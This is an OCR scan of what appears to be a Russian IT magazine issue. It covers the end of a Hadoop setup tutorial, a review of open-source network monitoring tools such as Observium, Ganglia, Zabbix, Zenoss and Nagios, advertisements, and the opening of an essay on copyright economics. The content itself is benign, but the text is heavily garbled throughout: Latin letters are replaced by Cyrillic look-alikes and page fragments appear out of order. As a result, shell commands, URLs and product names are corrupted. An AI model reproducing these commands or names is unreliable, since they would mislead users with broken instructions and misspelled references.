и ТазкТгаскег (МарРебисе). В кластере все они обычно работают на 
разных машинах, причем ЫатеМобе и ЭоЬТгаскег имеют по одному 
экземпляру, а ОаІаІМобе и ТаскТгаскег запускаются на всех осталь- 
ных узлах кластера и выполняют роль хранилища и узлов-рабочих. 
В нашем случае все они будут иметь по одному экземпляру и рабо- 
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5УЫ/АСК 
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ІШП 

Новая версия М5 5СИ 
Бегѵег и облачная 
платформа 
ѴѴ іпсіоѵѵб Аіиге 
включают в себя 
адаптированную 
версию Насіоор. 



Запускаем сервисы Насіоор одной командой 



тать на одной машине. Запусти ірз, чтобы проверить это, если все 
ок, можно приступать к экспериментам. 

Для начала проверим работоспособность веб-интерфейса 
ІМатеМобе и боЬТгаскег. Для этого зайди на страницы Ыір:// 
ІосаІЬо5І:50070 и Ыір://ІосаІЬо5І:50030. Также можно поэкспери- 
ментировать с командным интерпретатором Н0Р5: 

$ Ьіп/Ііабоор ~р5 -І5 / 

$ Ьіп/Ііасіоор Тб -тксііг /пембіг 
$ Ьіп/Ьасіоор Тб -гтг_/пеысІіп 
$ Ьіп/Ьасіоор Тб -сіи / 

Полную справку по поддерживаемым командам можно полу- 
чить, выполнив: 

$ Ьіп/Ьасіоор Тб -Ьеір 



димо произвести поиск строки. Пусть это будут конфигурационные 
файлы самого Насіоор: 

$ Ьіп/Ьасіоор Тб -риі сопТ іприі 

Запустим распределенный Стер для поиска строки по регулярно- 
му выражению 'бЫа-і.Ь' и помещения результата в каталог оиіриі: 

$ Ьіп/Ьасіоор з'аг ЬасІоор-ехатрІеБ-* . даг \ 

§пер іприі оиіриі 1 6 іб[э-2 . ] + 1 

На одной машине выполнение задания займет достаточно 
длительное время, поэтому придется подождать. По окончании 
процесса можно «вытащить» каталог оиіриі из РШР5: 

$ Ьіп/Ьасіоор -Рб -§еі оиіриі оиіриі 



Далее мы можем попробовать запустить свое первое 
МарРебисе-приложение. Взять его можно из комплекта примеров, 
поставляемых вместе с фреймворком. Для теста воспользуемся 
распределенной версией утилиты Згер. Создадим в файловой 
системе РЮР5 каталогдля хранения входных данных: 

$ Ьіп/Ьабоор -Рб -ткбіг^іприі: 

Положим в этот каталог несколько файлов, в которых необхо- 
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Веб-интерфейс ІМатеІМосіе 



Или просмотреть его содержимое прямо на месте: 

$ Ьіп/Ьабоор -Рб -саі оиіриі/* 

После экспериментов можно завершить работу всех демонов 
с помощью следующей команды: 

$ Ьіп/Біор-аІІ . бЬ 



выводы 



РІабоор, несомненно, станет платформой распределенных вычис- 
лений номер один в ближайшем будущем. Решающую роль в этом 
процессе сыграет не только МарРебисе, покровительство и пример 
многих маститых компаний, но и простота развертывания кластера 
на его основе. Наверное, ты удивишься, но развернуть Набоор 
на реальном железе из нескольких сотен машин будет ничуть не 
сложнее, чем выполнить установку в тестовом режиме. ПЕ 



ЗООПАРК В ОБЛАКАХ 



Ніѵе и Рід — проекты, призванные упростить 
процесс обработки большого количества 
данных на кластерах Набоор. НЬазе — 
построенная на НШРБ база данных, в которой 
все данные хранятся в колонках (является 
аналогом боодіе ВідТаЫе). 2ооКеерег — система 
распределенной синхронизации приложений, 
с помощью которой можно легко реализовать 
такие задачи, как выбор лидера, обнаружение 
сервисов, распределенная блокировка. 



• аоо.аІ/І.д5Гѵ — 

инструкция по 
развертыванию 
реального Насіоор- 
кластера; 

• доо.дІ/ЕгпР12 

— нагляднейшее 
введение в МарКе- 
сіисе от Джоэла 
Спольски; 

• ИаЬгаНаЬг.ги/ 
добі /103467 — 

простое и понятное 
введение в МарКе- 
сіисе на пальцах. 
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ѴѴѴ’ЧІШЬ 



молоко 






Вся продукция «ІЕВЬЕ МОЛОЧНИК- произведена из цельного 
(неаосстано влен него) молока очень высокого качества. 
Такой строгий контроль оказывается важным и для людей, 
заботящими о здоровье, поскольку а последнее время на рынке появилось 
^ .... мнацзюмелок и разбавлений как молока, так и продуктов изнын. 



ГиТД 




дшда 






шШ&Ш 




5УЫ/АСК 



Сергей «дгіпсіег» Яремчук (дгіпсіеггазупаск.ги) 





0В5ЕРѴШМ 



Распространяемая под лицензией СІМІІ 6РІ_ система мониторинга 
ОЬзегѵіит ( оЬзегѵіит.огд ) для сбора данных использует 5ЫМР 
и не требуетустановки агентов на клиентских системах. Поддер- 
живает большое количество оборудования и ОС: І_іпих, РгееВЗй, 
ѴѴіпсІоѵѵз, Сізсо, бипірег, Вгосабе, Роипбгу, принтеры ряда про- 
изводителей и многие другие девайсы. Одной из главных целей 
проекта является предоставление администратору простого 
в настройке и сопровождении инструмента с максимальной авто- 
матизацией всех процессов и доступностью информации. Проект 
не сразу стал называться ОЬзегѵіит, вначале он был известен как 
Кіккег (2006), затем Рго)есІ ОЬзегѵег (2006-2008) и ОЬзегѵегЫМВ 
(2008-2010). Процесс обнаружения и подключения устройств 
к серверу максимально упрощен и редко требует ручной подстрой- 
ки. Понятный интерфейс позволяет получать данные о состоянии 
систем (СРІІ, Мет, РЮй, температура, вольтаж, частота и прочее), 
выводить историю и текущие показатели статистик (загрузка, 
процессы, пользователи, графики интерфейсов), оценивать про- 
изводительность и ошибки сети (включая данные динамического 
роутинга ВОР, 05РР и ІРѵ6/ѵ4). Поддерживается специфический 
протокол Сізсо йізсоѵегу Ргоіосоі, позволяющий получать данные 
об оборудовании и настройках маршрутизаторов этой фирмы. 
Полный список устройств, работоспособность которых протести- 
рована с ОЬзегѵішті, можно найти по адресу: оЬзегѵіит.ога/ѵѵікі/ 



ОБЗОР ПОПУЛЯРНЫХ 

ОПЕНСОРСНЫХ 

СИСТЕМ 

МОНИТОРИНГА СЕТИ 

Учитывая, что разные разработчики по- 
своему понимают, как должно выглядеть 
средство мониторинга сети, выбрать такое 
решение, которое бы максимально подходило 
для конкретной сетевой среды со всеми ее 
особенностями и нюансами, довольно сложно. 
Многие опенсорсные системы могут дать фору 
проприетарным продуктам и за использование 
традиционно денег не берут. 
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Сетевые наблюдатели 



. В консоли управления выводится информация 
из Зузіод. Возможно подключение к сервису сбора и визуализации 
статистики СоІІесІсІ и Зтокеріпд (мониторинг состояния каналов). 

После подключения графики всех серверов выводятся в панели 
Оѵегѵіеѵѵ. Кроме этого, список всех систем и устройств расположен 
в меню йеѵісез. Чтобы получить больше информации, надо просто 
навести курсор на график и задержать его на некоторое время, 
в результате появятся дополнительные графики. Практически все 
подпункты содержат фильтры, позволяющие отобрать для вывода 
только те данные, которые сейчас необходимы. При таких возмож- 
ностях ОЬзегѵіит не содержит какой-либо системы оповещения, 
он ориентирован только на сбор и визуализацию данных. То есть 
он не заменяет, а скорее дополняет другие средства мониторинга, 
вроде ІЧадіоз и Сасіі, поэтому его часто разворачивают параллельно 
для вывода некоторых произвольных параметров. Разработчики 
брандмауэра тОпОѵѵаІІ (построенного на РгееВЗй) в своем решении 
упростили подключение и контроль при помощи ОЬзегѵіит. Проект 
также предлагает скрипты для контроля и мониторинга работы 
таких серверных приложений, как АрасЬе, пдіпх и Му50Ь. Взяв их 
за основу, можно написать и свои. Номер текущей версии 0.11.5.2261 
еще далек от финальной, но он отражает скорее планы разработчи- 
ков. Это вполне законченный продукт, готовый к промышленному 
использованию. Для отображения данных используется РРОіооІ, 
веб-интерфейс написан на РНР, все данные хранятся в Му50Ь, 
поэтому для установки можно использовать любой І_АМР-сервер 
(поддерживается АрасЬе с модулями гтюсІ_рЬр и тоб_геѵѵгіІе). 

Также потребуются пакеты іртііооі, дгарЬѵіг и Іріпд. Разработчики 
предлагают доступ к5ѴІ\І. В репозиториях дистрибутивов пакетов 
с ОЬзегѵіит нет, хотя сам процесс установки, в общем, стандартен 
для приложений, написанных на РНР. На сайте можно найти подроб- 
ные инструкции для ІІЬипІи, йеЬіап, РНЕІ_/СепШ5/РесІога и РгееВВй. 
Также проект предоставляет демо-интерфейс ( сІето.оЬзегѵіит.огд ). 
который позволит получить представление обо всех возможностях 
ОЬзегѵіит, не устанавливая его. 



бАИСИА 



Система мониторинга Оапдііа ( дапдІіа.іпРо ) разработана в недрах 
Калифорнийского университета в Беркли, давшего жизнь многим 
популярным проектам, в том числе и знаменитой В50. Ориентиро- 
вана в первую очередь на масштабируемые системы — кластеры 
и грид-инфраструктуры; администратор можетлегко отслеживать 
в реальном времени статистику, историю целого кластера или 
каждого узла в отдельности, анализировать информацию о до- 
ступности систем. Как и ОЬзегѵіит, Оапдііа ориентирована на сбор 




метрик и не содержит встроенную систему оповещения, о нерабо- 
тающих или перегруженных узлах можно судить лишь по графикам 
и изменившемуся цвету в названии узла. Информация о состоянии 
берется напрямую из псевдофайловой системы /ргос и обрабаты- 
вается модулем дтопсі, затем собирается в поток и перенаправля- 
ется на основной сервер демону дтеіасі. Обмен производится по 
ІЮР/ТСР на 8649-м порту, поэтому его нужно разрешить в прави- 
лах файера. Раньше Оапдііа могла собирать информацию только 
с систем, на которых был запущен агент, сейчас метрики можно 
получить практически с любого компьютера, для чего использу- 
ется механизм Отеігіс ОрооПпд. Возможна установка Оапдііа на 
следующие ОС: І_іпих, *В5й, Мае 05 X, Зоіагіз, ѴѴіпсІоѵѵз и отдельные 
облачные сервисы вроде Атагоп ЕС2. Для некоторых из них ко- 
мьюнити предложены специальные скрипты, упрощающие процесс 
развертывания. Для представления данных используется ХМЬ, для 
передачи — ХОР, функция визуализации и хранения возложена на 
РРйІооІ. Архитектура максимально адаптирована для обработки 
большого количества данных, в результате Оапдііа без проблем 
может работать в кластере, который содержит более 1000 узлов. 

В числе компаний, которые используют для мониторинга своих 
систем Оапдііа, можно найти ІЧА5А, ѴѴікіресІіа, МісгозоЙ, Тѵѵіиег 
и многие другие известные проекты. 

Веб-интерфейс построен на связке АрасЬе + РНР. Возможно- 
сти мониторинга можно расширять при помощи модулей. Напри- 
мер, дзіаі (Оапдііа Сіизіег Зіаіиз ТооІ) позволяет импортировать 
данные, собранные Оапдііа, в другие приложения. Использование 
модуля дехес дает возможность реализовать систему удаленного 
выполнения задач в кластерах, позволяя прозрачно перена- 
правлять потоки и события между распределенными процессами 
(используется аиіЬсІ) и масштабировать систему вплоть до 1000 
узлов без потери надежности. Поискав в интернете, можно найти 
скрипты, импортирующие статистику из популярных сервисов 
и приложений в понятный Оапдііа вид: Оапдііа-Тотсаі ( ЬііЬискеС 
огдЛаМзиІіап/дапдІіа-іотсаі ), ОапдІіа-ОгираІ ( сосіе.доодіе.сот/р/ 
дапдііа-сігираі ). етЬесІсІесІдтеІгіс (встроенные устройства, сосіе. 
аооаІе.сот/р/етЬеЬсІес1ате1гіс ). расширенные метрики для Ьіпих 
зі'пеі д тосі-ііпих ( еп.зоигсеіюгде.ір/ргоіесіз/зітеі дтосі-ііпих ) 
и многие другие. Специальный модуль ОапдІіа-АІегІ позволяет 
реализовать функционал отправки предупреждений ( 
сот/р/дапдІіа-аІегП . Возможна интеграция с ІЧадіоз, поэтому их 
часто устанавливают вместе. 

В репозиториях дистрибутива нужный пакет, как правило, уже 
присутствует. Для установки в ОеЬіап/ІІЬипІи достаточно выпол- 
нить команды: 
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бапдііа адаптирована для мониторинга кластеров 



$ біісіо ар1:-§е1: Іпв1:а11 §ап§1іа-топі1:ог §ап§1іа-ыеЬ-Ргоп1:епсІ 
$ зисіо ср /е1:с/^ап^1іа-ыеЬ-Рпоп1:епсІ/арасІіе. соггР \ 
7е1:с/арас1іе2/соп-Р.сІ/^ап^1іа-ыеЬ-Рпоп1:епсІ.соп-Р 
$ зисіо 5егѵісе арас!іе2 гезіагЕ 

После чего следует отредактировать конфигурационные файлы 
дтопсі.сопІ : (настройки кластера) и дтеіасі.сопі 1 (источники данных). 



2АВВІХ 



Мощная система распределенного мониторинга, ориентирован- 
ная на любой уровень — от небольших компаний до кластерных 
систем. Написана Алексеем Владышевым, поддерживается лат- 
вийской компанией 2аЬЫх 5ІА и распространяется по условиям 
6КШ 6РІ_. Позволяет собирать и отслеживать статусы серверов, 
сервисов, приложений и сетевого оборудования. Возможен рас- 
пределенный мониторинг производительности и доступности 
вплоть до 1000 узлов, автоматическое обнаружение узлов (по 
диапазону ІР, сервисам и 5ЫМР), с отчетностью и отслеживани- 
ем тенденций. Конфигурация серверов 2а Ь Ьіх централизована, 
при этом старшие по иерархии узлы контролируют настройки 
подчиненных серверов. Кроме сбора данных, предусмотрены 
уведомления пользователей различными способами (е-таіі, 
5М5, ^ЬЬег) и реакция на события в виде выполнения команд. 



После подключения всех систем будет сгенерирована наглядная 
карта сети. 

Возможен комплексный мониторинг, когда группа хостов 
определяется как один узел. Состояние системы определяет на- 
бор триггеров; что интересно, 2аЬЫх умеет различать связанные 
события, поэтому в случае выхода из строя маршрутизатора 
админ получит соответствующее сообщение только о его неис- 
правности, а не будет завален информацией о выходе из строя 
всех узлов, к которым 2аЬЫх не может получить доступ. Все 
данные доступны через веб-интерфейс, причем система визуа- 
лизации позволяет самостоятельно настроить вывод, и на одном 
графике может отражаться несколько значений, а внешний вид 
панелей легко подстроить «под себя». 

Реализована мощная система отчетов, способная выводить 
состояние системы за любой период в виде таблиц, рисунков 
и текстовых данных. Интерфейс локализован, доступна удобная 
панель, позволяющая перевести все сообщения на любой язык. 

Мониторинг возможен с использованием агентов и без них. 
Агенты доступны для большинства популярных ОС и платформ 
(*піх, ѴѴіпсІоѵѵз, Мае 05 X, Зоіагіз и прочие) и обеспечивают сбор 
всех параметров и анализ журналов систем. Если применение 
агентов невозможно, используется 5ЫМР (с поддержкой 5ЫМР- 
Ігар) и отслеживается состояние сервисов (РТР, 55Н, НТТР 
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и другие). Функция веб-мониторинга позволяет оценить время от- 
клика, скорость загрузки и код ответа сервера. Еще одной полез- 
ной возможностью является наблюдение за оборудованием (НР 
ІЮ, 5ип Ьагсіѵѵаге и тому подобное) с поддержкой ІРМІ (Іпіеііідепі 
РІаНогт Мападетепі Іпіегі'асе, интеллектуальный интерфейс 
управления платформой), позволяющей мониторить состояние 
компонентов и управлять встроенными функциями. 

В распределенных сетях для централизованного сбора данных 
из подсетей и отправки их на сервер предусмотрены 2аЬЫх- 
прокси. Сервер можно установить на любой *піх-системе. Для 
хранения информации используется база данных (ІВМ 0В2, Му5(ЭІ_, 
Огасіе, Ро5Ідге5СП_, 5СП_іІе). 

Пакеты ХаЬЬіх можно найти в репозиториях большинства дис- 
трибутивов Ыпих. На сайте проекта доступны исходные тексты, 
установочные пакеты агентов и образы для нескольких виртуаль- 
ных машин, содержащих преднастроенный сервер 2аЬЬіх (собраны 
с помощью ореп51І5Е Зіисііо). Можно отметить очень подробную до- 
кументацию на русском, в которой найдутся ответы на все вопросы, 
включая оптимизацию, сборник практик и решение проблем. Для 
тех, кто не может справиться с настройками, компания 2аЬЫх 5ІА 
предлагаетуслуги по интеграции и внедрению, пять уровней под- 
держки, различные тренинги и сертификацию. 



2ЕМ055 СОРЕ 



Система мониторинга сетевой инфраструктуры 2епоз5 Соге 
( соттипііѵ.гепозз.огд ) представляет собой серьезное решение 
уровня предприятия, распространяемое под лицензией СІМІІ СРЬ. 
Проект позиционируется как открытая альтернатива таким ре- 
шениям, как ІВМ Тіѵоіі, НР ОрепѴіеѵѵ, ВМС Раігоі. Начало разрабо- 
ток датировано 2002 годом, но версия 1.0 была анонсирована на 
5оигсеЕогде.пеІ лишь в 2006-м, с тех пор различные релизы с этого 
сайта скачаны более миллиона раз. Коммерческую ветку продукта 
2епо55 Епіегргізе (отличается наличием поддержки и некоторы- 
ми дополнительными модулями) продвигает компания 2епозз, 

Іпс., которая обеспечивает в том числе финансовую поддержку 
и разработку СРЕ-версии системы. Версия Епіегргізе использует- 
ся рядом известных компаний: ѴМѵѵаге, ЫА5А, Моіогоіа, АТІ. Для 
сбора и анализа информации используются І\ІеІ-5І\ІМР, РРОіооІ, 
Тѵѵізіесі и оригинальные наработки. На клиентских компьютерах 
программа-агент не устанавливается, это упрощает развертывание 
системы мониторинга. Для построения карт сетей и обнаружения 
систем и сервисов применяется автоматическое сканирование. 
Функция автообнаружения позволяет быстро подключиться 
и собрать информацию обо всех активных устройствах в сети. 




Информация по отдельному кластеру в окне бапдііа 



Параметры, полученные разными способами, нормализуются 
с использованием шаблонов и приводятся к единому виду, а ядро 
2епозз умеет анализировать среду и позволяет быстро разобрать- 
ся с большим количеством специфических устройств. В результате 
один сервер легко может контролировать до 10 000 устройств. 

Если обнаружена проблема, система может отправить сообщение 
администратору и выполнить определенное действие, например 
команду на перезапуск сервиса, или проиграть мелодию, чтобы 
администратор обратил внимание. Система, построенная на 2епозз 
Соге, обеспечивает: 

• мониторинг сетевых устройств при помощи 5ІММР, 55Н, ѴѴМІ, 

ЛЧХ, Ріпд/ІСМР и Вузіод; 

• мониторинг сетевых сервисов — НТТР, РОРЗ, ІМІМТР, 5ІММР, РТР; 

• мониторинг системных ресурсов популярных ОС и производи- 
тельности устройств; 

• оповещение с настраиваемыми событиями, реакцией и обнару- 
жением взаимосвязи. 

Возможности можно расширять за счет собственных плагинов 
(называются 2епРаск) и плагинов ІМадіоз. Список 2епРаскз, до- 
ступных на сайте проекта, весьма внушительный и насчитывает 
более 200 устройств (АРС, Сізсо, йеІІ), сервисов (Азіегізк, ѴМѵѵаге, 
Му5(ЭІ_, МісгозоЙ 115) и других дополнительных функций. Например, 
возможно удаленное управление и мониторинг систем при помощи 
Рирреі и СЕЕпдіпе. Установив апплеты 2аррІеІ или 2епТгауІсоп, 
можно получать уведомления в реальном времени прямо на рабо- 
чий стол. 

Написан 2епозз Соге на языке РуіЬоп с использованием сер- 
вера приложений 2оре, данные хранятся в Му5СИ_. Для установки 
сервера потребуется компьютер, работающий под управлени- 
ем Ыпих, ЕгееВЗй, 5оІагіз/0реп5оІагіз, Мае 05 X или ѴМѵѵаге 
Аррііапсе. Сама установка во всех системах очень проста и выпол- 
няется при помощи дружелюбного мастера. Управление произво- 
дится при помощи веб-интерфейса. Интерфейс не локализован, 
но это не мешает разобраться, так как все термины известны даже 
начинающему сисадмину. При необходимости локализацию можно 
провести самостоятельно. Стоит отметить вполне подробную до- 
кументацию (на английском) и наличие канала на ѴоиТиЬе. 



№6105 



ІМадіоз ( падіоз.огд ) — одна из самых популярных Ореп 5оигсе 
систем мониторинга, которая не только умеет следить за работо- 
способностью узлов и служб, но и в случае возникновения проблем 
оповещает администратора разными способами. С ее помощью 




Функция веб-мониторинга — одна из фишек 2аЬЫх 
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I чшп 

• Сайт системы 
мониторинга ОЬ- 
вегѵіит: 

оЬзегѵіит.ога: 

• сайт проекта 
бапдііа: аапсіІіа.іпГо: 

• инструкция по 
созданию модулей 
для бапдііа: 

сІск.ги/ОхѵѵѴѴК: 

• сайт 2аЬЬіх: 

гаЬЬіх.сот/ги: 

• сайтСоттипіІу 
версии 2епо55Соге: 

соттипИу.2епо55. 

ого: 

• полный список 
устройств, 
работоспособность 
которых 
протестирована 
сОЬвегѵіит, 
доступен по адресу: 
оЬ5егѵіит.ога/ѵѵікі/ 
Би ррогіесі Реѵісез: 

• сайт Мадіоз: 
падіоБ.огд . 



Графики производительности Іепозз 



можно отслеживать использование ресурсов сервера: загружен- 
ность процессора и ОЗУ, место на харде и так далее. Ыадіоз про- 
изводит мониторинг доступности большинства сетевых сервисов: 
5МТР, РОРЗ, ІМАР, 55Н, ТЕІ.МЕТ, РТР, НТТР, 0Ы5 и многих других. 
Возможен удаленный мониторинг через шифрованные 55Н- или 
551-туннели. Для сбора данных можно использовать специальный 
агент. Администратор может определить иерархию узлов, что дает 
возможность отличать действительно неработающие узлы от тех, 
которые недоступны системе мониторинга из-за неполадок на 
промежуточных пунктах. При возникновении проблем с сервисом 
или узлом администратор может получать оповещение по е-таіі 
или 5М5, использовать обработчик события. Изначально Ыадіоз 
была разработана под І_іпих, но со временем появилась поддержка 
и других ОС, в том числе и ѴѴіпсІоѵѵз. Стандартные возможности 
мониторинга, визуализации данных и конфигурирования можно 
расширить при помощи плагинов, большую часть которых пишут 
и поддерживают сами разработчики. Для удобного поиска модулей, 
утилит и документации предложен репозиторий Ыадіоз ЕхсЬапде 



( ехсЬапае.падіоз.огд ). Проект предлагает простой интерфейс 
и подробную документацию, позволяющие в случае необходимости 
написать модуль самостоятельно, используя любой удобный язык 
программирования (БЬеІІ, С++, РегІ, РуіЬоп, РНР и другие). 

Администраторы любят Ыадіоз за умение строить карты сетевой 
инфраструктуры, графики различных параметров наблюдаемых 
систем и подробные отчеты о состоянии хостов и сервисов. Для 
получения данных используется веб-интерфейс, каждый поль- 
зователь может получить доступ только к «своим» данным. Пакет 
с Ыадіоз можно найти в репозиториях большинства дистрибутивов 
Ыпих, поэтому его установка проблем обычно не вызывает. 



ЗАКЛЮЧЕНИЕ 



Учитывая специфику систем мониторинга, победителя обзора 
определять не будем. Для одних условий будет достаточно про- 
стого в настройках ОЬзегѵіит, в распределенных сетях выручит 
бапдііа. Если важен не только сбор данных, но и оповещение, сле- 
дует обратить внимание на 2аЬЫх, 2е позз Соге или Ыадіоз. □С 



5РІСЕѴѴ0КК5 



Одной из главных особенностей системы 
мониторинга Брісеѵѵогкз ( зрісеѵѵогкз.сот ) 
является то, что сервер доступен только под 
ѴѴіпсіоѵѵз. Система поставляется с собственным 
НТТР-сервером и всеми необходимыми 
компонентами, поэтому установить его может 
администратор с любым опытом работы, 
буквально в несколько кликов. Во время 
установки потребуется доступ в интернет 
для регистрации аккаунта, который будет 



использован для работы в Брісеѵѵогкз, 
а также в форуме поддержки. Управление 
производится через локализованный веб- 
интерфейс, который легко перестраивается под 
требования админа. Система автоматически 
обнаруживает новые устройства в сети, 
производит инвентаризацию оборудования 
и установленного ПО, мониторинг, отправляет 
уведомления о неполадках, получает 
и выводит системные события (Еггог и ѴѴагп- 



іпд), показывает сводную информацию по 
работе антивирусов. Используя Брісеѵѵогкз, 
сисадмин всегда будет в курсе событий 
(например, в таком-то принтере закончился 
картридж, а в системе такой-то исчерпалось 
дисковое пространство). Возможна интеграция 
с Асііѵе Оігесіогу, расширения позволяют 
нарастить возможности программы. Система 
бесплатна, единственный минус — приходится 
наблюдать за блоком рекламы. 
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ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



ДХт Мы аілем.гд^орлірсі-іоиіііспмы^лѵішчі? продукту. 
Шш Вы знаете, что жжете кгійти юс рядом. под маркой ТАЗН 



Реклама 



СЦЕНА 



Н. Н. Федотов (Ілпй^пп.ги) 




Интеллектуальная собствен- 
ность изменила мир не мень- 
ше, чем ядерное оружие. 

А потом компьютеры измени- 
ли его еще раз. В результате 
интеллектуальная собствен- 
ность впала в кризис и готова 
взорваться. 



НЕМАТЕРИАЛЬНАЯ ЭКОНОМИКА 



В отличиеотматериальныхобъектов, интел- 
лектуальную собственность (ИС) очень легко 
«украсть». Кней не приставишь вооруженный 
караул, ее не запрешь в сейф. Для охраны И С не- 
обходимо, чтобы во всех странах мира действо- 
вали более-менее унифицированные законы 
по ее защите. Как только в какой-то стране 
законодательство начинает позволять больше, 
чем в других, через эту страну возни кает утечка 
прибыли. Там принимаются издавать, выпускать 
в свет, прокатывать, перерабатывать, перево- 
дить, хостить и внедрять чужую ИС, не платя за 



нее или платя меньше других. А потом уже за кон - 
ноэкспортировать«отмытую» ИС во вседругие 
страны, лишая правообладателя прибыли, 
на которуютотрассчитывал. 

Когда интересы правообладателей в одной 
стране защищены сильнее, а в другой слабее 
(или вообще незащищены], комуэто выгодно? 
Смотря кто из нихбольше продаетинтеллекту- 
ального продукта. Экспортеру выгодна сильная 
защита прав, импортеру — слабая. Редко какая 
страна производитстолькоже ИС, сколько потре- 
бляет. Обычно есть дисбаланс. Нетрудно понять, 
что для экспортера ИС любое ослабление право- 
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История копирастии 




Авторы 



ѵ ) 




V 

-ІО 4 






Издательства 



“V" 

-ю’ 



Читатели 



Схема 1. Модель копирайта бумажной эры 

Красные связи законтребуетоформлять письменным договором (предварительным согласием). Синие связи позво- 
ляютбездоговорное использование, нособязательной привязкой кэкземпляру. 

Автор может издать в год одну книгу, самые писучие из авторов — около десяти (сучетом переиздания прошлых); 
нет никаких проблем согласовать и подписать договор на каждую из них. Ути личного издательства выходит в год 
100 — 1000 книг; оформить договор на каждую — посильная задача для штатных юристов. А вот количество ежегодно 
выпускаемыхэкземпляров в издательстве исчисляется миллионами и десятками миллионов; никакие письменные 
договоры для каждого потребителя невозможны. Именно поэтомузаконодательустановил обязательность договора 
автора с издателем, а передачу читателю прав на использование не обусловил договором, а привязал кэкземпляру 



вой за щиты — это недополученная прибыль. 
Причем немалого размера. 

В со в ременных товарах доля стоимости, при- 
ходящаяся на И С, колеблется в районе 30-50%. 
Патенты, дизайн, товарный знак, ноу-хау, 
лицензии на софт — всеэто интеллектуальная 
собственность. 

Наиболее интеллектуальноемкие товары 
представляют собой 10 граммов кремния, 20 
граммов стали, 150 граммов пластмассы и полча- 
са работы китайского сборщика — это все тянет 
на 1 доллар. Остальные 999 долларов составляют 
технологи и, товарные знаки, топологи и микро- 
схем, патенты на самоустройство и на сборочных 
роботов, атакже лицензии на софт. Плюс патен- 
ты, технологии и лицензии на все то, при помощи 
чего произвели комплектующие, доставили 
материалы и обучили персонал. 

Одежда стоварным знаком итальянского 
«производителя» обычно изготавливается 
в Турции из турецкого или египетского хлопка. 

Но стоит она в 2-4 раза дороже, чем одежда стой 
же самой фабрики, из того же сырья, пошитая 
теми же рабочими на том же оборудовании, но без 
товарного знака. Указанная разница представ- 
ляетсобой стоимостьтоварногознака (бренда). 
Ведущие мировые бренды оцениваются поэтой 
методике в миллиарды долларов. 

А в некоторых товарах, таких как программ- 
ное обеспечение и кино, доля интеллектуалки 
доходитдо 100%. Миллионы и даже сотни 
миллионов долларовтратятся на производство 
первой копии. Дальней шее тиражирование — 
практически бесплатно. 

Себестоимость производства партии товара 
все меньшезависитотразмера партии. Вэтих 
условиях расчет рентабельности коренным 



образом меняется по сравнению с выпуском 
«материальной» продукции. Если мы выпускаем, 
к примеру, стальные ложки (соотношение матери- 
альной и интеллектуальной долей себестоимости 
М/И = 95/5) и какая-то страна вдругперестала их 
покупать, большой беды неслучится. Произво- 
дитель снижает выпуск, его издержки при этом 
снижаются почти пропорционально объему вы- 
пуска (то есть снижается М, остается неизменной 
И). Доход и издержки коррелируютмежду собой на 
95%. Поэтому норма прибыли остается почти не- 
изменной. /производителя фильмов (М/И = 0/100) 
при падении спроса доход снизится, а издержки 
останутся прежними. Если он уже привык питать 
своим продуктом весьмир, отстроил студии, завел 
звезд с астрономическими гонорарами, отбашлял 
политикам итакдалее — ему будеттрудно пере- 
строиться и снизитьиздержки. 

И наоборот — пролоббировать более строгие 
законы о копирайте означает повысить доход, не 
увеличив при этом затрат на производство И С. 
Деньги из воздуха! Трудноудержаться оттакого 
соблазна. 



КОПИРАЙТ И ГЛОБАЛИЗМ 



Какая страна сколько производит ИС и сколько 
ее потребляет — не секрет. Все государства де- 
лятся на нетто-экспортеров и нетто-импортеров. 
Последние живут в постоянном искушении 
ослабить защиту. Любое ослабление (что де-юре, 
что де-факто) сразу же приводит к снижению по- 
тока денег в страны-экспортеры. Искушение, не 
та кл и? Принимаешь ма -а -аленькую поправочку 
к за кону, снижаешь срок охраны произведений 
на па ру лет, и сразу — бац! — миллиард долларов 
из ниоткуда. Который раньшеуходил правооб- 
ладателямза океан. 



У нетто-экспортера ситуация противополож- 
ная. Чуть-чутьстрожезаконы — и миллиардле- 
титуже нетуда, а сюда, из чужого кармана в свой. 
Проблема в том, что стране — импортеру ИС надо 
править свои собственные законы, а стра не- 
экспортеру — чужие. Это возможно только если 
стать «мировым жандармом» и ликвидировать 
национальный суверенитет. Международное 
право должно стать выше национального. 

Чужие парламенты должны принимать законы, 
которые им невыгодны, а полиция — принуждать 
к их выполнению, чтобы поток лицензионных 
отчисленийтекза границу, в страну, производя- 
щую ИС. Это, собственно, и есть«новый мировой 
порядок», который раньше советские политики 
называли «неоколониализм». Очень похоже на 
эксплуатацию кол он ий, только вместо стеклян- 
ных бус — чисто виртуальный товар: лицензии, 
патенты, технологи и, товарные знаки. Товар, 
который «производителю» ничего не стоит, ибо 
тиражирование бесплатно. 

Давайте посмотрим на безобидную (на 
первый взгляд) инициативу Пиратской партии — 
снизить срок охраны компьютерных программ до 
пяти лет. Сейчас этот срок составляет «все время 
жизни последнего из соавторов плюс 70 лет (в Ев- 
ропе — плюс 50)», то есть практически вечно. 
«Зачем вам такая долгая охрана? — спрашива- 
ютпираты. — Ведьв вашей структуре продаж 
софт пяти летней давности составляет 0,003%, 
а десятилетний софт — круглый ноль. Небудьте 
собакой на сене». Правообладатели отвечают: 
«Ишь какие хитрые! Пяти -сем и летний софт 
вполне еще работоспособен. Сделай его бес- 
платным — такдветрети пользователей на него 
перейдут и перестанут покупать новый. Аунас 
прибыльностьвсего 150%. То естьдоходы всего 
лишь в 2,5 раза превышают издержки. Срежь две 
трети доходов — и что останется? Всю отрасль 
угробить хотите?» 

Ужиматься в издержках действительно не- 
легко. Доходы правообладателей — это и доходы 
государства — экспортера ИС. Поступающие 
в оплату лицензий деньги облагаются налогами, 
причем несколько раз: как экспорт, как прибыль 
компании, как зарплата ее работников, как 
купленные ими товары итакдалее. Бюджет США 
и сейчас крайне плохо сбалансирован и держится 
за счет эмиссии доллара. Что же с ним будет, если 
нанести удар по нематериальной составляющей 
американского экспорта? 

Вот, например, бюджетТаиланда копирайтных 
войн небоится. Егоэкспортсоставляютсугубо ма- 
териальные продукты: рис, креветки, презерва- 
тивы, каучук. Даже при полной отмене авторских 
и патентныхправэтитовары врядли подешевеют. 
А вотс экспортом США ситуация кардинально 
иная: оружие (высокотехнологичное), компьютер- 
ные программы, медикаменты, музыка, филь- 
мы, товарные знаки, электроника. Если что-то 
случится с интеллектуальной собственностью, 
если за нее вдруг ста нут платить меньше, бюджет 
лишится такого значительного куска, что баланс 
уже ничем не восстановишь. Будет, какв Греции: 
